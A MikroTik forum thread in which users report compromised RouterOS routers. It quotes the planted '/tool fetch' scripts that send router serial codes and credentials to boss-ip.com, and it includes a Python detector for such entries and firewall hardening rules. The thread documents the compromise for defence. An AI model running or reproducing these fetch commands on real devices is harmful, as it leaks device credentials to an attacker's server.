bug persists after updating to 6.42.3

We had issues with the src address lists in the firewall letting through all traffic rather than only the traffic listed, so of course they blew right through a non-functional firewall.

They put two scripts in there: one was enabling PPPoE out, the other was this.

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=7da1df40bdee0309&action=upload&sncode=BDDC61FCE64D0922DD64998709BB639A&dynamic=static&user=myusername&pwd=mypassword")}

When you go to this site it tries to infect your system right off. Looks like they’re trying to get a bunch of infected machines mining coins for them. Not sure what their intent is with Mikrotik hardware.

Without confirmation that you are following stated directions…
a. you are using latest OS
b. have closed down the router from external access.

Then one can expect to be hacked unfortunately.

I have the same problem with two MikroTiks. Both have the latest firmware and RouterOS version from two weeks ago.

http://forum.mikrotik.com/t/s-o-s-new-vurnelabilty-on-6-42-3-no/120528/1

Hello,

here is some more information about the changes that have been made:

I immediately updated my version. I can't tell which version I had before.

Scripts:

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=bdee03097da1df40&action=upload&sncode=17E88147941B12F2E415872A518FBD9F&dynamic=static")}

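As an added example (not code from the thread or from MikroTik), a Python check that scans a RouterOS /export for script and scheduler entries calling /tool fetch, like the ones posted above, and flags fetches to hosts outside an assumed allowlist and credentials passed in the URL. The sample export is constructed; the domain is the one quoted in the posts, and key/sncode are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in the shape of a RouterOS "/export" (not a real export).
# The domain is the one quoted in the thread; key and sncode are placeholders.
SAMPLE_EXPORT = r'''
/system script
add name=script1 policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    source="/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\?key=PLACEHOLDER&action=upload&sncode=PLACEHOLDER&dynamic=static&user=myusername&pwd=mypassword\")"
/system scheduler
add interval=1d name=schedule1 on-event="/tool fetch url=\"https://upgrade.mikrotik.com/routeros/NEWEST.6.stable\" dst-path=ver.txt" \
    start-time=startup
'''

WATCHED_SECTIONS = {"/system script", "/system scheduler"}
ALLOWED_HOSTS = {"upgrade.mikrotik.com", "download.mikrotik.com"}  # assumed allowlist
SECRET_KEYS = {"user", "pwd", "password", "pass"}
URL_RE = re.compile(r'https?://[^\s"\\)]+')


def _entries(text):
    """Join export continuation lines (trailing backslash) into single entries."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield (buf + line).strip()
        buf = ""


def find_fetch_scripts(export_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (section, name, host, reasons) per /tool fetch entry; reasons is empty when clean."""
    findings, section = [], None
    for entry in _entries(export_text):
        if entry.startswith("/"):
            section = entry
            continue
        if section not in WATCHED_SECTIONS or not entry.startswith("add ") or "/tool fetch" not in entry:
            continue
        cleaned = entry.replace("\\", "")  # drop RouterOS escaping (\" and \?)
        name = re.search(r"\bname=(\S+)", cleaned).group(1)
        for url in URL_RE.findall(cleaned):
            parts = urlsplit(url)
            reasons = []
            if parts.hostname not in allowed_hosts:
                reasons.append("fetch to host not on allowlist")
            leaked = sorted(k for k in parse_qs(parts.query) if k.lower() in SECRET_KEYS)
            if leaked:
                reasons.append("credentials in URL: " + ",".join(leaked))
            findings.append((section, name, parts.hostname, reasons))
    return findings
```

Run it over the output of `/export` copied off the router; any fetch entry you did not create yourself is worth a netinstall and password change, as the thread advises.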

I’m very aware of those.

What I’m talking about is how we got hit with one.

Address lists are being ignored in the filter section of the firewall randomly.

We noticed it around 6.30 and it randomly pops up ever since. I had my DNS blocked to all but allowed address list of “DNS”. When I updated to 6.30 I had to change all of my rules as the DNS address list was ignored. The same was happening with my port 80 and winbox rules, only in reverse. Instead of only allowing my addresses it allowed all addresses and I didn’t catch it until we had already been hacked.

What I’m talking about is a system that was locked down to only allowed addresses through firewall filter rules. The address lists were ignored.

I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm.

If you didn’t change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.

Secure your firewall with these rules; change in-interface to match your WAN interface name.

/ip firewall filter
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection Start" disabled=yes
add action=add-src-to-address-list address-list=Hacker address-list-timeout=0s \
    chain=input comment="Add External Access Tries" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN log=yes log-prefix=\
    "Security System <>" protocol=tcp
add action=drop chain=input comment="Block External Access to Ports" dst-port=\
    21,22,23,80,443,8291,8728,8729 in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=tcp
add action=drop chain=input comment="Block External Access to DNS" dst-port=53 \
    in-interface=WAN protocol=udp
add action=passthrough chain=unused-hs-chain comment=\
    "###### Access Protection End" disabled=yes

By the way, I tracked the hacker's MAC address and found this result: E4:8D:8C:3A:E5:96, which belongs to RouterBoard.com!

That’s your WAN interface MAC address.

How did you know that! :smiley:

No buddy, I have checked all my ether and bridge MAC addresses, and that's not one of them.

I really wonder how you pulled a MAC address from the remote server RouterBoard.com.

What about your ISP gateway MAC address?

As side note, F5 blog https://www.f5.com/labs/articles/threat-intelligence/russian-attacks-against-singapore-spike-during-trump-kim-summit says there was attack on Jun 11 targeting some known vulnerabilities and Mikrotik’s port 8291 was not forgotten. See Fig 3 for attack destination country stats.

By firewall filter I log the attacker's src address, so when he attacks my host, the MikroTik server logs his src address and a src MAC address.
The src MAC address logged in my server log does not belong to me, that's all buddy.

I'm really wondering about the possibility of it being my ISP's WAN, so I didn't say that it's the attacker's MAC, I just said it belongs to RouterBoard.com.
But I'm sure that it's not my WAN interface MAC address.

I checked out the F5 blog, and I found the same IP subnet of the attacker bottled in my dynamic address list:

188.246.234.62 | in my dynamic address list
188.246.234.60 | in F5 article
Maybe they did it because of the Turkish elections, because my ISP is Turktelecom.

Also, I attached all the attacker IP addresses that attacked my nine servers, if you want to block them in advance :slight_smile:
Regards

MAC addresses work only at the broadcast domain level (layer 2). No MAC address is ever routed to another subnet. The MAC addresses on a frame are always updated by routers. So no, you do not have the MAC of your attacker. You have the MAC of the device in the broadcast domain that sent you the packet.

It's really valuable information, thx man.